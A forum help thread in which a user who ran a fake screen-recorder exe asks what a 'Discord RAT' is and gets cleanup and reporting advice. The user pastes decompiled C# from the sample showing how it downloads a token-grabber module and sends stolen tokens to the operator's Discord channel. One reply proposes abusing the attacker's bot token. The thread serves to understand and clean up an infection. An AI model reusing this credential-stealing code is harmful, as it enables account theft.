C#
Ramsey (OP, 5mo ago)

✅ Did I install malware?

hello there, I was trying to find a screen recording app on GitHub, so I found this repo, and it had instructions and everything, but the project was only an exe, so I installed it and I thought it was a false positive (I know I'm dumb). Anyway, after that, when I tried to open the exe file nothing appeared at all, so I figured it was malware or something. Then I tried to unpack the exe, so I searched for methods to decompile and eventually I happened to find an app called dotPeek. I managed to decompile the app and eventually found the source code, and it was as shown in the picture below. I don't know what information was stolen from me, but I am here to ask what a Discord RAT is, what this even means, and what the purpose of this project is, if anyone knows. Also the app included the token of the Discord bot and a guild id; what can I do with these?
(screenshot attached)
55 Replies
Jimmacle (5mo ago)
report it to Discord and stop clicking sketchy links or running sketchy programs. without seeing the rest of the code, I would guess it tries to either steal your Discord token and/or send messages from your account, or it's the other way around and they're using a Discord server as a way to run commands on your PC
Ramsey (OP, 5mo ago)
what do I do with the bot token and the guild id that I retrieved? I am a complete beginner. is it legal to log in to it and find what information is there, or do I just report it to Discord?
Jimmacle (5mo ago)
you're better off just reporting it. give them that information so they can shut down the server and whoever made the malware
SpReeD (5mo ago)
RAT is an abbreviation for Remote Administration Tool; yes, it's a cover name for a certain type of trojan since the late 90s
mg (5mo ago)
and here's a legitimate screen recorder https://obsproject.com/
Open Broadcaster Software | OBS
OBS (Open Broadcaster Software) is free and open source software for video recording and live streaming. Stream to Twitch, YouTube and many other providers or record your own videos with high quality H264 / AAC encoding.
Buddy (5mo ago)
RATs are the worst kind of malware, after ransomware of course, as your PC basically turns into a zombie. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning who just heard about it. It's basically as if you had TeamViewer on 24/7 and they can access everything
mg (5mo ago)
I'd rather be ransomwared than have someone have access to my machine
Buddy (5mo ago)
RATs can be recovered from; you're toast with ransomware
mg (5mo ago)
if you keep backups, then recovery from a ransomware attack is just wiping your machine and restoring from a backup
Buddy (5mo ago)
Just check autostart, temp directories, etc. Sysinternals Autoruns is a great tool for that
ACiDCA7 (5mo ago)
just out of interest, how do you get from screen recorder to something Discord-related? I mean, even the assembly is called discordrat
Ramsey (OP, 5mo ago)
what do you mean? ah, probably pasted in multiple applications
ACiDCA7 (5mo ago)
when you want to download a screen recorder, and you download something expecting a screen recorder, all alarms should go off if what you download is called discord***
Buddy (5mo ago)
Autoruns for Windows - Sysinternals
See what programs are configured to startup automatically when your system boots and you login.
Buddy (5mo ago)
Install this. Delete everything that does not belong
ACiDCA7 (5mo ago)
Malwarebytes wouldn't hurt as well
Ramsey (OP, 5mo ago)
well, I'm no expert in computer science, but the exe and the repo instructions have nothing to do with Discord except for the code itself. I also found something interesting:
```csharp
using System;
using System.Collections.Generic;
using System.Threading.Tasks;

// Decompiled from the sample. Program.LoadDll, Program.LinkToBytes,
// Program.StringToBytes, Program.Send_message and Program.Send_attachment
// are other helpers in the same decompiled assembly and are not shown here.
public static async Task get_tokens(string channelid)
{
    // The token-stealing module is not inside the exe: on first use it is
    // downloaded from a URL and loaded as an in-memory assembly.
    if (!Program.dll_holder.ContainsKey("token"))
        await Program.LoadDll("token", await Program.LinkToBytes(Program.dll_url_holder["token"]));
    // Instantiate Token_grabber.grabber from that assembly via reflection.
    if (!Program.activator_holder.ContainsKey("token"))
        Program.activator_holder["token"] = Activator.CreateInstance(Program.dll_holder["token"].GetType("Token_grabber.grabber"));
    object obj = Program.activator_holder["token"];
    // Call grabber.grab() and join whatever it harvested into one string.
    string input = string.Join("\n\n", (IEnumerable<string>) obj.GetType().GetMethod("grab").Invoke(obj, new object[0]));
    // Exfiltrate to the operator's Discord channel: as a tokens.txt attachment
    // when the result would exceed Discord's message length, inline otherwise.
    if (input.Length >= 1990)
    {
        string channelid1 = channelid;
        List<byte[]> attachments = new List<byte[]>();
        attachments.Add(Program.StringToBytes(input));
        string[] filenames = new string[1]{ "tokens.txt" };
        int num1 = await Program.Send_attachment(channelid1, "", attachments, filenames) ? 1 : 0;
        int num2 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
    }
    else
    {
        int num3 = await Program.Send_message(channelid, "\n" + input + "\n") ? 1 : 0;
        int num4 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
    }
}
```
and this string
Jimmacle (5mo ago)
yes, it probably hijacks your Discord account to spam messages to spread the malware, and 100% allows the attacker to control your PC, so you should get rid of this software ASAP using the tools the others mentioned
Ramsey (OP, 5mo ago)
(screenshot attached)
Jimmacle (5mo ago)
if you're lucky, it's not particularly embedded in your system and you can just delete it
Ramsey (OP, 5mo ago)
(screenshot attached)
Jimmacle (5mo ago)
which, if they're using a Discord server as a C&C server, they're probably not smart enough to make it very persistent
MODiX (5mo ago)
Quoting Buddy: "As your PC basically turns into a zombie. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning who just heard about it."
ACiDCA7 (5mo ago)
hmm, why did nobody recommend removing the internet connection yet? so it can't potentially infect other devices + no remote access
Buddy (5mo ago)
Good question
Ramsey (OP, 5mo ago)
at the beginning it was almost impossible to simply delete the file, but I managed with Norton antivirus
Buddy (5mo ago)
Boot up in safe mode, no internet. Run Malwarebytes; after that, run autostart and start deleting suspicious entries
exixt (5mo ago)
and then delete Norton because it's overflow; Windows Defender today is enough, it's actually good, not like 10 years ago. run Malwarebytes for spot checks every now and then, that's it. and after that never download random exes, that's internet 101
mg (5mo ago)
you should also report that repository to GitHub if that's where the executable is hosted
Ramsey (OP, 5mo ago)
does GitHub even care?
Jimmacle (5mo ago)
very much
exixt (5mo ago)
yes
mg (5mo ago)
yes
Jimmacle (5mo ago)
using their site to distribute malware counts as abuse
ACiDCA7 (5mo ago)
just did a random search on GitHub for discord rat.. well.. MS has to do some cleanup
Ramsey (OP, 5mo ago)
one extra question about dotPeek: does it actually decompile, or does it just give a C# representation of the binary? I am going to reset my PC anyway
SG97 (5mo ago)
I hope you mean clean install
Ramsey (OP, 5mo ago)
reinstall OS
ACiDCA7 (5mo ago)
it does decompile as best as it can.. it only has the information stored in the assembly, but dotnet apps are pretty easy to decompile
SG97 (5mo ago)
because to me, resetting != clean install
Ramsey (OP, 5mo ago)
dude, I have his bot token lol. I'm not completely sure if it's legal to do anything with it at this point, but the owner has literally done something terrible
ACiDCA7 (5mo ago)
report it
Ramsey (OP, 5mo ago)
already did. I'm talking about using it to access the info about this malware, though, before Discord shuts it down
ACiDCA7 (5mo ago)
I bet the token doesn't matter too much; it's just to get pings if a victim falls for the scam. as you showed in another screenshot, it wreaks more havoc besides sending a couple of messages via Discord
Ramsey (OP, 5mo ago)
probably has a server channel that contains a text list of victims
ACiDCA7 (5mo ago)
why are you still here? go fix your PC so it's not a potential hazard
Jimmacle (5mo ago)
that's exactly what decompiling is: it translates the IL into equivalent C#
Ramsey (OP, 5mo ago)
I'm on a different PC
Jimmacle (5mo ago)
which is why you should report it to Discord so they can handle it. not to be rude, but you ignored your AV and installed a RAT; you shouldn't be trying to get justice yourself
Ramsey (OP, 5mo ago)
yeah, sent a ticket
Anu6is (5mo ago)
That's not possible. The token gives you access to the bot account... the application on Discord. But it doesn't give you access to the code they use the token with.
Buddy (5mo ago)
I personally would spam the author's channel with the bot so the author is forced to regenerate the bot token, and then all their malware stops working
Bob l'éponge (5mo ago)
oof
(image attached)